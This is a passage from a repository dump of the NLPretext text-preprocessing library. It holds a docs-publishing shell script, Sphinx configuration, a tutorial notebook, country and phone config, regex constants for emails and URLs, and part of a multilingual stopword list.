# (NOTE(review): lexicographically last, not necessarily the newest tag).
current_tag_message=$(git cat-file -p $(git rev-parse $(git tag -l | tail -n1)) | tail -n +6)
make clean
make apidoc
# sphinx-multiversion builds from committed state, so the freshly generated
# apidoc stubs must be committed before building.
git add .
git commit -m "Commit needed for multiversioning"
git pull --tags
git tag -a latest -m "Latest version of the package"
make multiversion
#######################
# Update GitHub Pages #
#######################
# Stage the built HTML in a temporary dir, then recreate the gh-pages branch
# from scratch so it contains only the published site.
docroot=`mktemp -d`
cp -r build/html/* ${docroot}
cd ..
git branch -d gh-pages
git checkout --orphan gh-pages
git rm --cached -r .
git clean -fdx
# Adds .nojekyll file to the root to signal to GitHub that
# directories that start with an underscore (_) can remain
touch .nojekyll
# Add index.html
cat > index.html <
Redirecting to the latest release
EOF
# Add README
cat > README.md <
Other Versions
v: {{ current_version.name }}
{%- if versions.tags %}
Tags
{%- for item in versions.tags %}
{{ item.name }}
{%- endfor %}
{%- endif %}
{%- if versions.branches %}
Branches
{%- for item in versions.branches %}
{{ item.name }}
{%- endfor %}
{%- endif %}
{%- endif %}
================================================
FILE: docs/source/conf.py
================================================
# Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# https://www.sphinx-doc.org/en/master/usage/configuration.html
# -- Path setup --------------------------------------------------------------
# Make the repository root importable so autodoc can find the nlpretext
# package without installing it.
import os
import sys

sys.path.insert(0, os.path.abspath(".."))

# -- Project information -----------------------------------------------------
project = "nlpretext"
author = "artefactory"

# -- General configuration ---------------------------------------------------
# Builtin Sphinx extensions plus markdown support (recommonmark), notebook
# rendering (nbsphinx), multi-version builds and the RTD theme.
extensions = [
    "sphinx.ext.autodoc",
    "sphinx.ext.autosummary",
    "sphinx.ext.intersphinx",
    "sphinx.ext.mathjax",
    "sphinx.ext.napoleon",
    "sphinx.ext.todo",
    "sphinx.ext.viewcode",
    "recommonmark",
    "nbsphinx",
    "sphinx_multiversion",
    "sphinx_autodoc_typehints",
    "sphinx_rtd_theme",
]
source_suffix = {
    ".rst": "restructuredtext",
    ".txt": "restructuredtext",
    ".md": "markdown",
}
source_parsers = {".md": "recommonmark.parser.CommonMarkParser"}
# Never execute notebooks during the documentation build.
nbsphinx_execute = "never"
# Project URL. Fix: this variable was previously assigned twice, the second
# time with a stray trailing "}" that produced a broken link; keep a single
# correct value.
github_url = "https://github.com/artefactory/NLPretext"
# sphinx-multiversion: build from local refs only.
smv_prefer_remote_refs = False
smv_remote_whitelist = None
# Regenerate the API stubs before each versioned build.
smv_prebuild_command = (
    "poetry run sphinx-apidoc -f -o source/apidoc/ "
    "../nlpretext/ "
    "--implicit-namespaces -M -t source/_templates"
)
# Add any paths that contain templates here, relative to this directory.
templates_path = ["_templates"]
# Autodoc parameters
always_document_param_types = True
add_module_names = False
autodoc_member_order = "bysource"

# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages.
html_theme = "sphinx_rtd_theme"
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ["_static"]

# -- Options for LaTeX output ------------------------------------------------
latex_elements = {
    # Font packages
    "fontpkg": "\\usepackage{amsmath, amsfonts, amssymb, amsthm}"
}
================================================
FILE: docs/source/index.rst
================================================
=========
NLPretext
=========
Welcome to NLPretext's documentation!
========================================
The NLPretext library aims to be a meta-library that helps you get started with preprocessing for your NLP use case.
Installation
============
This package has been tested on Python `3.8`, `3.9` & `3.10`; it does not support Python **2.7**, which reached end of life in January 2020.
To install this library, run::

    pip install nlpretext
.. toctree::
:maxdepth: 4
:caption: Tutorials:
./tutorials/index
.. toctree::
:maxdepth: 2
:caption: API Reference:
./apidoc/modules
Indices and tables
==================
* :ref:`genindex`
* :ref:`modindex`
* :ref:`search`
================================================
FILE: docs/source/tutorials/basic_notebook.ipynb
================================================
{
"cells": [
{
"cell_type": "markdown",
"metadata": {},
"source": [
"# How to use the package in a notebook\n",
"\n",
"\n",
"\n",
"
\n",
"\n",
"\n",
"\n",
"
\n",
"\n",
"### *nlpretext*\n",
"\n",
"
\n",
"\n",
"## Installing from the main branch\n",
"\n",
"To install the library from the main branch, you can run the following cell :"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {
"pycharm": {
"name": "#%%\n"
}
},
"outputs": [],
"source": [
"%pip install git+ssh://git@github.com/artefactory/NLPretext.git@main"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Installing from a specific release\n",
"\n",
"To install the library from a specific release, you can run the following cell :"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {
"pycharm": {
"name": "#%%\n"
}
},
"outputs": [],
"source": [
"%pip install git+ssh://git@github.com/artefactory/NLPretext.git@v1.0.5"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Using the package\n",
"\n",
"You can now import and run whatever is in the package :"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {
"pycharm": {
"name": "#%%\n"
}
},
"outputs": [],
"source": [
"from nlpretext.basic.preprocess import replace_emails\n",
"\n",
"example = \"I have forwarded this email to obama@whitehouse.gov\"\n",
"example = replace_emails(example, replace_with=\"*EMAIL*\")"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {
"pycharm": {
"name": "#%%\n"
}
},
"outputs": [],
"source": [
"print(example)"
]
}
],
"metadata": {
"kernelspec": {
"display_name": "Python 3",
"language": "python",
"name": "python3"
},
"language_info": {
"codemirror_mode": {
"name": "ipython",
"version": 3
},
"file_extension": ".py",
"mimetype": "text/x-python",
"name": "python",
"nbconvert_exporter": "python",
"pygments_lexer": "ipython3",
"version": "3.7.9"
}
},
"nbformat": 4,
"nbformat_minor": 1
}
================================================
FILE: docs/source/tutorials/index.rst
================================================
Tutorials
=========
.. toctree::
:maxdepth: 4
:glob:
basic_notebook
================================================
FILE: nlpretext/__init__.py
================================================
# GNU Lesser General Public License v3.0 only
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
# mypy: disable-error-code="attr-defined"
# mypy: disable-error-code="assignment"
"""All the goto functions you need to handle NLP use-cases, integrated in NLPretext."""
from importlib.metadata import PackageNotFoundError, version
from nlpretext.preprocessor import Preprocessor
# Resolve the installed distribution's version at import time; when the
# package is imported from a source tree that is not pip-installed, fall back
# to the "unknown" placeholder instead of failing.
try:
    __version__ = version(__name__)
except PackageNotFoundError:  # pragma: no cover
    __version__ = "unknown"
# Public API of the top-level package.
__all__ = ["Preprocessor"]
================================================
FILE: nlpretext/_config/__init__.py
================================================
# GNU Lesser General Public License v3.0 only
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
================================================
FILE: nlpretext/_config/config.py
================================================
# GNU Lesser General Public License v3.0 only
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#!/usr/local/bin/python3
from typing import List, Optional
import os
import phonenumbers as _phonenumbers
# Absolute path to the repository root, two levels up from this _config package.
_CONFIG_DIR = os.path.dirname(__file__)
ROOT_FOLDER = os.path.abspath(os.path.join(_CONFIG_DIR, os.pardir, os.pardir))
# Country config
COUNTRY_MAPPING_ISO = {
"af": "Afghanistan",
"ax": "Åland Islands",
"al": "Albania",
"dz": "Algeria",
"as": "American Samoa",
"ad": "Andorra",
"ao": "Angola",
"ai": "Anguilla",
"aq": "Antarctica",
"ag": "Antigua and Barbuda",
"ar": "Argentina",
"am": "Armenia",
"aw": "Aruba",
"au": "Australia",
"at": "Austria",
"az": "Azerbaijan",
"bs": "Bahamas",
"bh": "Bahrain",
"bd": "Bangladesh",
"bb": "Barbados",
"by": "Belarus",
"be": "Belgium",
"bz": "Belize",
"bj": "Benin",
"bm": "Bermuda",
"bt": "Bhutan",
"bo": "Bolivia (Plurinational State of)",
"bq": "Bonaire, Sint Eustatius and Saba",
"ba": "Bosnia and Herzegovina",
"bw": "Botswana",
"bv": "Bouvet Island",
"br": "Brazil",
"io": "British Indian Ocean Territory",
"bn": "Brunei Darussalam",
"bg": "Bulgaria",
"bf": "Burkina Faso",
"bi": "Burundi",
"cv": "Cabo Verde",
"kh": "Cambodia",
"cm": "Cameroon",
"ca": "Canada",
"ky": "Cayman Islands",
"cf": "Central African Republic",
"td": "Chad",
"cl": "Chile",
"cn": "China",
"cx": "Christmas Island",
"cc": "Cocos (Keeling) Islands",
"co": "Colombia",
"km": "Comoros",
"cg": "Congo",
"cd": "Congo, Democratic Republic of the",
"ck": "Cook Islands",
"cr": "Costa Rica",
"ci": "Côte d'Ivoire",
"hr": "Croatia",
"cu": "Cuba",
"cw": "Curaçao",
"cy": "Cyprus",
"cz": "Czechia",
"dk": "Denmark",
"dj": "Djibouti",
"dm": "Dominica",
"do": "Dominican Republic",
"ec": "Ecuador",
"eg": "Egypt",
"sv": "El Salvador",
"gq": "Equatorial Guinea",
"er": "Eritrea",
"ee": "Estonia",
"sz": "Eswatini",
"et": "Ethiopia",
"fk": "Falkland Islands (Malvinas)",
"fo": "Faroe Islands",
"fj": "Fiji",
"fi": "Finland",
"fr": "France",
"gf": "French Guiana",
"pf": "French Polynesia",
"tf": "French Southern Territories",
"ga": "Gabon",
"gm": "Gambia",
"ge": "Georgia",
"de": "Germany",
"gh": "Ghana",
"gi": "Gibraltar",
"gr": "Greece",
"gl": "Greenland",
"gd": "Grenada",
"gp": "Guadeloupe",
"gu": "Guam",
"gt": "Guatemala",
"gg": "Guernsey",
"gn": "Guinea",
"gw": "Guinea-Bissau",
"gy": "Guyana",
"ht": "Haiti",
"hm": "Heard Island and McDonald Islands",
"va": "Holy See",
"hn": "Honduras",
"hk": "Hong Kong",
"hu": "Hungary",
"is": "Iceland",
"in": "India",
"id": "Indonesia",
"ir": "Iran (Islamic Republic of)",
"iq": "Iraq",
"ie": "Ireland",
"im": "Isle of Man",
"il": "Israel",
"it": "Italy",
"jm": "Jamaica",
"jp": "Japan",
"je": "Jersey",
"jo": "Jordan",
"kz": "Kazakhstan",
"ke": "Kenya",
"ki": "Kiribati",
"kp": "Korea (Democratic People's Republic of)",
"kr": "Korea, Republic of",
"kw": "Kuwait",
"kg": "Kyrgyzstan",
"la": "Lao People's Democratic Republic",
"lv": "Latvia",
"lb": "Lebanon",
"ls": "Lesotho",
"lr": "Liberia",
"ly": "Libya",
"li": "Liechtenstein",
"lt": "Lithuania",
"lu": "Luxembourg",
"mo": "Macao",
"mg": "Madagascar",
"mw": "Malawi",
"my": "Malaysia",
"mv": "Maldives",
"ml": "Mali",
"mt": "Malta",
"mh": "Marshall Islands",
"mq": "Martinique",
"mr": "Mauritania",
"mu": "Mauritius",
"yt": "Mayotte",
"mx": "Mexico",
"fm": "Micronesia (Federated States of)",
"md": "Moldova, Republic of",
"mc": "Monaco",
"mn": "Mongolia",
"me": "Montenegro",
"ms": "Montserrat",
"ma": "Morocco",
"mz": "Mozambique",
"mm": "Myanmar",
"na": "Namibia",
"nr": "Nauru",
"np": "Nepal",
"nl": "Netherlands",
"nc": "New Caledonia",
"nz": "New Zealand",
"ni": "Nicaragua",
"ne": "Niger",
"ng": "Nigeria",
"nu": "Niue",
"nf": "Norfolk Island",
"mk": "North Macedonia",
"mp": "Northern Mariana Islands",
"no": "Norway",
"om": "Oman",
"pk": "Pakistan",
"pw": "Palau",
"ps": "Palestine, State of",
"pa": "Panama",
"pg": "Papua New Guinea",
"py": "Paraguay",
"pe": "Peru",
"ph": "Philippines",
"pn": "Pitcairn",
"pl": "Poland",
"pt": "Portugal",
"pr": "Puerto Rico",
"qa": "Qatar",
"re": "Réunion",
"ro": "Romania",
"ru": "Russian Federation",
"rw": "Rwanda",
"bl": "Saint Barthélemy",
"sh": "Saint Helena, Ascension and Tristan da Cunha",
"kn": "Saint Kitts and Nevis",
"lc": "Saint Lucia",
"mf": "Saint Martin (French part)",
"pm": "Saint Pierre and Miquelon",
"vc": "Saint Vincent and the Grenadines",
"ws": "Samoa",
"sm": "San Marino",
"st": "Sao Tome and Principe",
"sa": "Saudi Arabia",
"sn": "Senegal",
"rs": "Serbia",
"sc": "Seychelles",
"sl": "Sierra Leone",
"sg": "Singapore",
"sx": "Sint Maarten (Dutch part)",
"sk": "Slovakia",
"si": "Slovenia",
"sb": "Solomon Islands",
"so": "Somalia",
"za": "South Africa",
"gs": "South Georgia and the South Sandwich Islands",
"ss": "South Sudan",
"es": "Spain",
"lk": "Sri Lanka",
"sd": "Sudan",
"sr": "Suriname",
"sj": "Svalbard and Jan Mayen",
"se": "Sweden",
"ch": "Switzerland",
"sy": "Syrian Arab Republic",
"tw": "Taiwan, Province of China",
"tj": "Tajikistan",
"tz": "Tanzania, United Republic of",
"th": "Thailand",
"tl": "Timor-Leste",
"tg": "Togo",
"tk": "Tokelau",
"to": "Tonga",
"tt": "Trinidad and Tobago",
"tn": "Tunisia",
"tr": "Turkey",
"tm": "Turkmenistan",
"tc": "Turks and Caicos Islands",
"tv": "Tuvalu",
"ug": "Uganda",
"ua": "Ukraine",
"ae": "United Arab Emirates",
"gb": "United Kingdom of Great Britain and Northern Ireland",
"us": "United States of America",
"um": "United States Minor Outlying Islands",
"uy": "Uruguay",
"uz": "Uzbekistan",
"vu": "Vanuatu",
"ve": "Venezuela (Bolivarian Republic of)",
"vn": "Viet Nam",
"vg": "Virgin Islands (British)",
"vi": "Virgin Islands (U.S.)",
"wf": "Wallis and Futuna",
"eh": "Western Sahara",
"ye": "Yemen",
"zm": "Zambia",
"zw": "Zimbabwe",
}
# Phone numbers config
SUPPORTED_COUNTRY: List[Optional[str]] = [
None,
"US",
"AG",
"AI",
"AS",
"BB",
"BM",
"BS",
"CA",
"DM",
"GD",
"GU",
"JM",
"KN",
"KY",
"LC",
"MP",
"MS",
"PR",
"SX",
"TC",
"TT",
"VC",
"VG",
"VI",
"RU",
"KZ",
"EG",
"ZA",
"GR",
"NL",
"BE",
"FR",
"ES",
"HU",
"IT",
"VA",
"RO",
"CH",
"AT",
"GB",
"GG",
"IM",
"JE",
"DK",
"SE",
"NO",
"SJ",
"PL",
"DE",
"PE",
"MX",
"CU",
"AR",
"BR",
"CL",
"CO",
"VE",
"MY",
"AU",
"CC",
"CX",
"ID",
"PH",
"NZ",
"SG",
"TH",
"JP",
"KR",
"VN",
"CN",
"TR",
"IN",
"PK",
"AF",
"LK",
"MM",
"IR",
"SS",
"MA",
"EH",
"DZ",
"TN",
"LY",
"GM",
"SN",
"MR",
"ML",
"GN",
"CI",
"BF",
"NE",
"TG",
"BJ",
"MU",
"LR",
"SL",
"GH",
"NG",
"TD",
"CF",
"CM",
"CV",
"ST",
"GQ",
"GA",
"CG",
"CD",
"AO",
"GW",
"IO",
"AC",
"SC",
"SD",
"RW",
"ET",
"SO",
"DJ",
"KE",
"TZ",
"UG",
"BI",
"MZ",
"ZM",
"MG",
"RE",
"YT",
"ZW",
"NA",
"MW",
"LS",
"BW",
"SZ",
"KM",
"SH",
"TA",
"ER",
"AW",
"FO",
"GL",
"GI",
"PT",
"LU",
"IE",
"IS",
"AL",
"MT",
"CY",
"FI",
"AX",
"BG",
"LT",
"LV",
"EE",
"MD",
"AM",
"BY",
"AD",
"MC",
"SM",
"UA",
"RS",
"ME",
"XK",
"HR",
"SI",
"BA",
"MK",
"CZ",
"SK",
"LI",
"FK",
"BZ",
"GT",
"SV",
"HN",
"NI",
"CR",
"PA",
"PM",
"HT",
"GP",
"BL",
"MF",
"BO",
"GY",
"EC",
"GF",
"PY",
"MQ",
"SR",
"UY",
"CW",
"BQ",
"TL",
"NF",
"BN",
"NR",
"PG",
"TO",
"SB",
"VU",
"FJ",
"PW",
"WF",
"CK",
"NU",
"WS",
"KI",
"NC",
"TV",
"PF",
"TK",
"FM",
"MH",
"KP",
"HK",
"MO",
"KH",
"LA",
"BD",
"TW",
"MV",
"LB",
"JO",
"SY",
"IQ",
"KW",
"SA",
"YE",
"OM",
"PS",
"AE",
"IL",
"BH",
"QA",
"BT",
"MN",
"NP",
"TJ",
"TM",
"AZ",
"GE",
"KG",
"UZ",
"DO",
]
# Mapping from a human-readable format name to the corresponding
# phonenumbers.PhoneNumberFormat enum value, used when formatting
# phone numbers.
FORMAT_NUMBERS = {
    fmt_name: getattr(_phonenumbers.PhoneNumberFormat, fmt_name)
    for fmt_name in ("E164", "INTERNATIONAL", "NATIONAL", "RFC3966")
}
================================================
FILE: nlpretext/_config/constants.py
================================================
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License
# mypy: disable-error-code="attr-defined"
"""
Collection of regular expressions and other (small, generally useful) constants.
Credits to textacy for some of them: https://github.com/chartbeat-labs/textacy.
"""
import re
import sys
import unicodedata
import regex
# Named-entity labels that denote numeric entities
# (presumably spaCy NER labels — confirm against usage elsewhere in the package).
NUMERIC_NE_TYPES = {
    "ORDINAL",
    "CARDINAL",
    "MONEY",
    "QUANTITY",
    "PERCENT",
    "TIME",
    "DATE",
}
# Dependency-parse labels for subjects, objects and auxiliaries
# (presumably spaCy/Universal-Dependencies labels — confirm against usage).
SUBJ_DEPS = {"agent", "csubj", "csubjpass", "expl", "nsubj", "nsubjpass"}
OBJ_DEPS = {"attr", "dobj", "dative", "oprd"}
AUX_DEPS = {"aux", "auxpass", "neg"}
REPORTING_VERBS = {
"according",
"accuse",
"acknowledge",
"add",
"admit",
"agree",
"allege",
"announce",
"argue",
"ask",
"assert",
"believe",
"blame",
"charge",
"cite",
"claim",
"complain",
"concede",
"conclude",
"confirm",
"contend",
"criticize",
"declare",
"decline",
"deny",
"describe",
"disagree",
"disclose",
"estimate",
"explain",
"fear",
"hope",
"insist",
"maintain",
"mention",
"note",
"observe",
"order",
"predict",
"promise",
"recall",
"recommend",
"reply",
"report",
"say",
"state",
"stress",
"suggest",
"tell",
"testify",
"think",
"urge",
"warn",
"worry",
"write",
}
# Mapping from currency symbol to its three-letter currency code;
# the keys also feed CURRENCY_REGEX below.
CURRENCIES = {
    "$": "USD",
    "zł": "PLN",
    "£": "GBP",
    "¥": "JPY",
    "฿": "THB",
    "₡": "CRC",
    "₦": "NGN",
    "₩": "KRW",
    "₪": "ILS",
    "₫": "VND",
    "€": "EUR",
    "₱": "PHP",
    "₲": "PYG",
    "₴": "UAH",
    "₹": "INR",
}
# Part-of-speech regex patterns for noun-phrase / prepositional-phrase /
# verb-phrase chunking, keyed by language code. Patterns are matched against
# sequences of "<POS>" tags.
# NOTE(review): the original literal was corrupted during extraction (the
# angle-bracketed tags were stripped); reconstructed from the credited
# upstream source, textacy (https://github.com/chartbeat-labs/textacy).
POS_REGEX_PATTERNS = {
    "en": {
        "NP": r"<DET>? <NUM>* (<ADJ> <PUNCT>? <CONJ>?)* (<NOUN>|<PROPN> <PART>?)+",
        "PP": r"<ADP> <DET>? <NUM>* (<ADJ> <PUNCT>? <CONJ>?)* (<NOUN> <PART>?)+",
        "VP": r"<AUX>* <ADV>* <VERB>",
    }
}
# str.translate table mapping every Unicode punctuation code point
# (general category "P*") to a single space.
PUNCT_TRANSLATE_UNICODE = {
    code_point: " "
    for code_point in range(sys.maxunicode)
    if unicodedata.category(chr(code_point)).startswith("P")
}
# Acronyms/initialisms: runs of (optionally dotted) capitals, possibly mixed
# with digits (second alternation branch handles digit-led forms like "3-D").
ACRONYM_REGEX = re.compile(
    r"(?:^|(?<=\W))(?:(?:(?:(?:[A-Z]\.?)+[a-z0-9&/-]?)+(?:[A-Z][s.]?|[0-9]s?))|(?:[0-9](?:\-?[A-Z])+))(?:$|(?=\W))",
    flags=re.UNICODE,
)
# Email addresses: local part (dots allowed, but not consecutive), "@", then
# a domain of 1-3 dotted labels ending in a 2+-letter TLD.
EMAIL_REGEX = re.compile(
    r"(?:^|(?<=[^\w@.)]))([\w+-](\.(?!\.))?)*?[\w+-]@(?:\w-?)*?\w+(\.([a-z]{2,})){1,3}(?:$|(?=\b))",
    flags=re.IGNORECASE | re.UNICODE,
)
# North-American-style phone numbers: optional "+1" country code, optional
# 3-digit area code, 7-digit number, optional extension ("ext.", "#", "x").
PHONE_REGEX = re.compile(
    r"(?:^|(?<=[^\w)]))(\+?1[ .-]?)?(\(?\d{3}\)?[ .-]?)?(\d{3}[ .-]?\d{4})(\s?(?:ext\.?|[#x-])\s?\d{2,6})?(?:$|(?=\W))" # noqa: E501
)
# Numbers with optional sign, thousands separators (comma, or space/dot in
# other locales) and an optional decimal part.
NUMBERS_REGEX = re.compile(
    r"(?:^|(?<=[^\w,.]))[+–-]?(([1-9]\d{0,2}(,\d{3})+(\.\d*)?)|([1-9]\d{0,2}([ .]\d{3})+(,\d*)?)|"
    r"(\d*?[.,]\d+)|\d+)(?:|(?=\b))"
)
# One or more currency symbols, built from the keys of CURRENCIES.
CURRENCY_REGEX = re.compile("({})+".format("|".join(re.escape(c) for c in CURRENCIES)))
# Runs of line breaks: \r\n, \n or \v, one or more times.
LINEBREAK_REGEX = re.compile(r"((\r\n)|[\n\v])+")
# Whitespace runs whose first character is not a newline.
NONBREAKING_SPACE_REGEX = re.compile(r"(?!\n)\s+")
# Web URLs: mandatory scheme ("http(s)://", "ftp://") or leading "www.",
# optional user:pass authentication, then either a public IPv4 address or a
# hostname with a TLD, optional port, optional resource path.
# NOTE(review): the head of this literal was corrupted during extraction;
# reconstructed from the source the file itself credits:
# https://gist.github.com/dperini/729294
URL_REGEX = re.compile(
    r"(?:^|(?<![\w/.]))"
    # protocol identifier
    r"(?:(?:https?://|ftp://|www\d{0,3}\.))"
    # user:pass authentication
    r"(?:\S+(?::\S*)?@)?"
    r"(?:"
    # IP address exclusion
    # private & local networks
    r"(?!(?:10|127)(?:\.\d{1,3}){3})"
    r"(?!(?:169\.254|192\.168)(?:\.\d{1,3}){2})"
    r"(?!172\.(?:1[6-9]|2\d|3[0-1])(?:\.\d{1,3}){2})"
    # IP address dotted notation octets
    # excludes loopback network 0.0.0.0
    # excludes reserved space >= 224.0.0.0
    # excludes network & broadcast addresses
    # (first & last IP address of each class)
    r"(?:[1-9]\d?|1\d\d|2[01]\d|22[0-3])"
    r"(?:\.(?:1?\d{1,2}|2[0-4]\d|25[0-5])){2}"
    r"(?:\.(?:[1-9]\d?|1\d\d|2[0-4]\d|25[0-4]))"
    r"|"
    # host name
    r"(?:(?:[a-z\u00a1-\uffff0-9]-?)*[a-z\u00a1-\uffff0-9]+)"
    # domain name
    r"(?:\.(?:[a-z\u00a1-\uffff0-9]-?)*[a-z\u00a1-\uffff0-9]+)*"
    # TLD identifier
    r"(?:\.(?:[a-z\u00a1-\uffff]{2,}))"
    r")"
    # port number
    r"(?::\d{2,5})?"
    # resource path
    r"(?:/\S*)?"
    r"(?:$|(?![\w?!+&/]))",
    flags=re.UNICODE | re.IGNORECASE,
)  # source: https://gist.github.com/dperini/729294
# Shortened URLs (e.g. "bit.ly/abc123"): optional scheme, short domain,
# a single "/", then a 2-12 character hash.
# NOTE(review): this literal was corrupted during extraction; reconstructed
# from textacy (https://github.com/chartbeat-labs/textacy), the credited
# upstream of these constants — verify against the original file.
SHORT_URL_REGEX = re.compile(
    r"(?:^|(?<![\w/.]))"
    # optional scheme
    r"(?:(?:https?://)?)"
    # domain
    r"(?:\w-?)*?\w+(?:\.[a-z]{2,12}){1,3}"
    r"/"
    # hash
    r"[^\s.,?!'\"|+]{2,12}"
    r"(?:$|(?![\w?!+&/]))",
    flags=re.IGNORECASE,
)
# TEXT LOADER
# Accepted text-file names: a json/csv/txt/parquet extension, optionally
# followed by .gz / .zip compression suffixes.
TEXT_FILE_FORMATS_PATTERN = re.compile(r"^.*\.(json|csv|txt|parquet)(\.gz|\.zip)*$")
================================================
FILE: nlpretext/_config/stopwords.py
================================================
STOPWORDS = {
"af": [
"'n",
"aan",
"af",
"al",
"as",
"baie",
"by",
"daar",
"dag",
"dat",
"die",
"dit",
"een",
"ek",
"en",
"gaan",
"gesê",
"haar",
"het",
"hom",
"hulle",
"hy",
"in",
"is",
"jou",
"jy",
"kan",
"kom",
"ma",
"maar",
"met",
"my",
"na",
"nie",
"om",
"ons",
"op",
"saam",
"sal",
"se",
"sien",
"so",
"sy",
"te",
"toe",
"uit",
"van",
"vir",
"was",
"wat",
"ʼn",
],
"ha": [
"a",
"amma",
"ba",
"ban",
"ce",
"cikin",
"da",
"don",
"ga",
"in",
"ina",
"ita",
"ji",
"ka",
"ko",
"kuma",
"lokacin",
"ma",
"mai",
"na",
"ne",
"ni",
"sai",
"shi",
"su",
"suka",
"sun",
"ta",
"tafi",
"take",
"tana",
"wani",
"wannan",
"wata",
"ya",
"yake",
"yana",
"yi",
"za",
],
"so": [
"aad",
"albaabkii",
"atabo",
"ay",
"ayaa",
"ayee",
"ayuu",
"dhan",
"hadana",
"in",
"inuu",
"isku",
"jiray",
"jirtay",
"ka",
"kale",
"kasoo",
"ku",
"kuu",
"lakin",
"markii",
"oo",
"si",
"soo",
"uga",
"ugu",
"uu",
"waa",
"waxa",
"waxuu",
],
"st": [
"a",
"ba",
"bane",
"bona",
"e",
"ea",
"eaba",
"empa",
"ena",
"ha",
"hae",
"hape",
"ho",
"hore",
"ka",
"ke",
"la",
"le",
"li",
"me",
"mo",
"moo",
"ne",
"o",
"oa",
"re",
"sa",
"se",
"tloha",
"tsa",
"tse",
],
"sw": [
"akasema",
"alikuwa",
"alisema",
"baada",
"basi",
"bila",
"cha",
"chini",
"hadi",
"hapo",
"hata",
"hivyo",
"hiyo",
"huku",
"huo",
"ili",
"ilikuwa",
"juu",
"kama",
"karibu",
"katika",
"kila",
"kima",
"kisha",
"kubwa",
"kutoka",
"kuwa",
"kwa",
"kwamba",
"kwenda",
"kwenye",
"la",
"lakini",
"mara",
"mdogo",
"mimi",
"mkubwa",
"mmoja",
"moja",
"muda",
"mwenye",
"na",
"naye",
"ndani",
"ng",
"ni",
"nini",
"nonkungu",
"pamoja",
"pia",
"sana",
"sasa",
"sauti",
"tafadhali",
"tena",
"tu",
"vile",
"wa",
"wakati",
"wake",
"walikuwa",
"wao",
"watu",
"wengine",
"wote",
"ya",
"yake",
"yangu",
"yao",
"yeye",
"yule",
"za",
"zaidi",
"zake",
],
"yo": [
"a",
"an",
"bá",
"bí",
"bẹ̀rẹ̀",
"fún",
"fẹ́",
"gbogbo",
"inú",
"jù",
"jẹ",
"jẹ́",
"kan",
"kì",
"kí",
"kò",
"láti",
"lè",
"lọ",
"mi",
"mo",
"máa",
"mọ̀",
"ni",
"náà",
"ní",
"nígbà",
"nítorí",
"nǹkan",
"o",
"padà",
"pé",
"púpọ̀",
"pẹ̀lú",
"rẹ̀",
"sì",
"sí",
"sínú",
"ṣ",
"ti",
"tí",
"wà",
"wá",
"wọn",
"wọ́n",
"yìí",
"àti",
"àwọn",
"é",
"í",
"òun",
"ó",
"ń",
"ńlá",
"ṣe",
"ṣé",
"ṣùgbọ́n",
"ẹmọ́",
"ọjọ́",
"ọ̀pọ̀lọpọ̀",
],
"zu": [
"futhi",
"kahle",
"kakhulu",
"kanye",
"khona",
"kodwa",
"kungani",
"kusho",
"la",
"lakhe",
"lapho",
"mina",
"ngesikhathi",
"nje",
"phansi",
"phezulu",
"u",
"ukuba",
"ukuthi",
"ukuze",
"uma",
"wahamba",
"wakhe",
"wami",
"wase",
"wathi",
"yakhe",
"zakhe",
"zonke",
],
"da": [
"af",
"alle",
"andet",
"andre",
"at",
"begge",
"da",
"de",
"den",
"denne",
"der",
"deres",
"det",
"dette",
"dig",
"din",
"dog",
"du",
"ej",
"eller",
"en",
"end",
"ene",
"eneste",
"enhver",
"et",
"fem",
"fire",
"flere",
"fleste",
"for",
"fordi",
"forrige",
"fra",
"få",
"før",
"god",
"han",
"hans",
"har",
"hendes",
"her",
"hun",
"hvad",
"hvem",
"hver",
"hvilken",
"hvis",
"hvor",
"hvordan",
"hvorfor",
"hvornår",
"i",
"ikke",
"ind",
"ingen",
"intet",
"jeg",
"jeres",
